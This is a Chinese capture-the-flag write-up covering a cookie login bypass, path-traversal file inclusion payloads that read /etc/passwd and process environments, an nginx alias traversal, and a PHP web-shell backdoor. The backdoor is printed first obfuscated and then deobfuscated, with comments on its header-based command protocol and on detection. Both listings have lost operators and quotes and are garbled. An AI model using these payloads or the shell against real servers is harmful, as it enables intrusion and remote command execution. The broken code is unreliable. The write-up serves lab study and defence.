这题考察了绕过登录、目录浏览、后门利用
进来先是一个登录框，随便怎么输前端都直接弹窗；禁用 js 后再输入，然后登录
查看源码，好家伙，不管输什么都进不去。直接扫目录：访问 /robots.txt，访问 /hint.php，访问 /Hack.php。抓包看一下，cookie 里 isLogin=0 改为 1
发包发现成功登录
改下 cookie，点击管理中心，发现 url 改变，意思是存在任意文件包含
同时页眉多了 please continue，提示我们路子对了。这里太明显了：file 就是文件名，ext 是文件后缀。尝试直接读环境变量，但无回显：
?file=file:///proc/1/environ&ext=
?file=file:///etc/passwd&ext=
经过尝试发现 ../ 被替换为空：
?file=./index.php 回显正常。再输入 ../index.php 仍回显正常，可能 ../ 被替换为空；尝试 inde../x.php 发现回显仍然正常，印证猜想。
双写绕过即可：..././
?file=..././..././..././..././..././etc/passwd&ext=
结合 hint.php：
?file=..././..././..././..././..././etc/nginx/sites-enabled/site.conf&ext=
拿到配置文件内容：

server {
    listen 8080; ## listen for ipv4; this line is default and implied
    listen [::]:8080; ## listen for ipv6
    root /var/www/html;
    index index.php index.html index.htm;
    port_in_redirect off;
    server_name _;
    # Make site accessible from http://localhost/
    #server_name localhost;
    # If block for setting the time for the logfile
    if ($time_iso8601 ~ ^(\d{4})-(\d{2})-(\d{2})) {
        set $year $1;
        set $month $2;
        set $day $3;
    }
    # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html
    sendfile off;
    set $http_x_forwarded_for_filt $http_x_forwarded_for;
    if ($http_x_forwarded_for_filt ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) {
        set $http_x_forwarded_for_filt $1???;
    }
    # Add stdout logging
    access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log;
    error_log /var/log/nginx/error.log info;
    location / {
        # First attempt to serve request as file, then
        # as directory, then fall back to index.html
        try_files $uri $uri/ /index.php?q=$uri&$args;
        server_tokens off;
    }
    #error_page 404 /404.html;
    # redirect server error pages to the static page /50x.html
    #error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }
    location ~ \.php$ {
        try_files $uri $uri/ /index.php?q=$uri&$args;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param SCRIPT_NAME $fastcgi_script_name;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param REMOTE_ADDR $http_x_forwarded_for;
    }
    location ~ /\. {
        log_not_found off;
        deny all;
    }
    location /web-img {
        alias /images/;
        autoindex on;
    }
    location ~* \.(ini|docx|pcapng|doc)$ { deny all; }
    include /var/www/nginx[.]conf;
}
注意这里：
location /web-img { alias /images/; autoindex on; }
这里设置了 /web-img 为 /images/ 的别名，autoindex on 开启了目录列表。由于 location 前缀 /web-img 没有以 / 结尾而 alias 以 / 结尾，/web-img../ 会被映射成 /images/../，因此存在目录穿越（修复方法是把 location 写成 /web-img/，并关闭不需要的 autoindex）。
直接访问根目录 /web-img../，再访问 /web-img../proc/1/environ
下载附件，发现啥也没有（读环境变量的执念）
找到 hack.php.bak，访问并下载附件：
<?php
$U_/|U,/-/|U),ar|Uray|U(/|U,),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|Uo|Ub_get_|Ucontents(|U);|Uob_end_cle;
$qs[|U$i];$p|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].|U$p|U;|U$e|Ustrpos($s[$i],$f);|Ui;
$Mlstrtolower|U;$i$m|U[1|U][0].$m[1]|U[1];$|U|Uh$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f$s|Ul($ss(|Umd5($i.$;
$zr$r[|UHTTP_R|UEFERER|U];$r|U|Ua$r[HTTP_A|U|UCCEPT_LAN|UGUAGE|U];if|U($r|Ur|U$ra){$uparse_|Uurl($r;
$k?:;q0.([\\|Ud]))?,|U?/,$ra,$m)|U;if($|Uq$m){|U|U|Usession_start()|U|U;$s$_SESSIO|UN;$ss|Usubst|Ur;|U|U$s;
$o|U$l;|U){for|U($j0;($j|U$c|U|U$i|U$|Ul);$j,$i){$o.$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r$|U_SERV|UE|UR;$r;
$N|Uf($e){$k$k|Uh.$kf|U;ob_sta|Urt();|Ueva|Ul(g|Uzuncom|Upress(x(|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray(/;
$Can();$db|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut(|U$k$d/$k|U);ses|U|Usion_des|Utroy();}}}};
$j$k|Uh|U|U42f7;$kfe9ac;fun|Uction|U |Ux($t,$k){$c|U|Ustrlen($k);$ls|Utrl|Ue|Un($t);$o|U;fo|Ur($i0;$i;
$Rstr_replace(rO,,rOcreatrOe_rOrOfurOncrOtion);
$Jkf|U),|U0,3));$p|U;for(|U|U$|Uz1;$zcou|Unt|U($m[1]);|U$z)$p.|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U0){$;
$xr)|U;pa|Urse|U_str($u[qu|U|Uery],$q);$|U|Uqarray_values(|U$q);pre|Ug|U_match_al|Ul(/([\\|U|Uw])[|U\\w-]|U(;
$fstr_replace(|U,,$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
$gcreate_function(,$f);
$g();
?>
代码经过了混淆加密，echo $f; 即可
再用美化工具处理一下：
<?php
// NOTE(review): this listing lost its operators and quotes in extraction
// (`$kh42f7;` is presumably `$kh = "42f7";`); it is reproduced for analysis
// only and is not runnable as printed.
// Two halves of the shared secret of the backdoor: concatenated ($kh.$kf)
// they form the XOR key passed to x() and the marker printed around the
// output; each half is also mixed into md5() below to derive the
// per-request start/end markers of a command.
$kh42f7;
$kfe9ac;
// Repeating-key XOR used by the shell in both directions: decoding the
// incoming command and encoding the captured output. $t is walked byte by
// byte and each byte is XORed with the key byte at the same offset modulo
// strlen($k). Operators were lost in extraction; read the loops as
// `for ($i = 0; $i < $l;)` / `for ($j = 0; $j < $c && $i < $l; $j++, $i++)`.
// Note the `$t{$i}` curly-brace string offset: that syntax was removed in
// PHP 8.0, so this agent only runs on PHP 7.x and older (the nginx config
// above hands .php to php5.6-fpm).
function x($t,$k) {$cstrlen($k);$lstrlen($t);$o;for ($i0;$i$l;) {for ($j0;($j$c$i$l);$j,$i) {$o.$t {$i}^$k {$j};}}return $o;
}
// Request-handling half of the backdoor. Together with x() above this is a
// session-based PHP web shell (payload in the Referer query string, chunk
// order in Accept-Language, md5 of key halves as markers -- this looks like
// the agent generated by the weevely tool; verify before relying on that
// attribution). Operators were lost in extraction, so read `$a$b` as
// `$a = $b`, `$q$m` as `$q && $m`, and so on.
$r$_SERVER;
// Trigger headers: the command rides in the Referer's query string and the
// chunk order in Accept-Language, so an ordinary request never reaches
// eval() and the file looks inert in a casual browser check.
$rr$r[HTTP_REFERER];
$ra$r[HTTP_ACCEPT_LANGUAGE];
// Flow of the single line below:
//  1. parse_url/parse_str split the Referer query into values $q;
//     preg_match_all pulls "lang;q=0.N"-style pairs out of Accept-Language
//     into $m.
//  2. $i = first two captured language chars; $h/$f = lower-cased 3-char
//     prefixes of md5($i.$kh) and md5($i.$kf), used as the start and end
//     markers of a command.
//  3. Query values are concatenated in the order given by the q-value digits
//     into $p and appended to $s[$i] ($s presumably aliases $_SESSION), so a
//     command can be spread over several requests; a leading $h resets it.
//  4. Once the end marker $f is present: URL-safe base64 (`_`/`-` swapped
//     back) -> base64_decode -> x() XOR with $kh.$kf -> gzuncompress ->
//     eval().
//  5. Output is captured with ob_start/ob_get_contents/ob_end_clean, XOR +
//     gzcompress + base64 encoded, printed as "<key><data>/<key>", then the
//     session is destroyed.
// Detection/response notes: look for requests to a rarely-used .php file
// that carry a Referer with a query string plus an Accept-Language with
// q-values, responses bracketed by the same 8-hex-char string ($kh.$kf), and
// the eval(gzuncompress(...base64_decode(...))) chain in file scans; remove
// the file and its .bak copy (the write-up found hack.php.bak) and rotate
// any secrets reachable from the web root.
if($rr$ra) {$uparse_url($rr);parse_str($u[query],$q);$qarray_values($q);preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/,$ra,$m);if($q$m) {session_start();$s$_SESSION;$sssubstr;$slstrtolower;$i$m[1][0].$m[1][1];$h$sl($ss(md5($i.$kh),0,3));$f$sl($ss(md5($i.$kf),0,3));$p;for ($z1;$zcount($m[1]);$z)$p.$q[$m[2][$z]];if(strpos($p,$h)0) {$s[$i];$p$ss($p,3);}if(array_key_exists($i,$s)) {$s[$i].$p;$estrpos($s[$i],$f);if($e) {$k$kh.$kf;ob_start();eval(gzuncompress(x(base64_decode(preg_replace(array(/_/,/-/),array(/,),$ss($s[$i],0,$e))),$k)));$oob_get_contents();ob_end_clean();$dbase64_encode(x(gzcompress($o),$k));print($k$d/$k);session_destroy();}}}
}

分析文章：
我的评价是：不多纠结，直接拿脚本打了
system(ls);
system(cat fllla4aggg.php);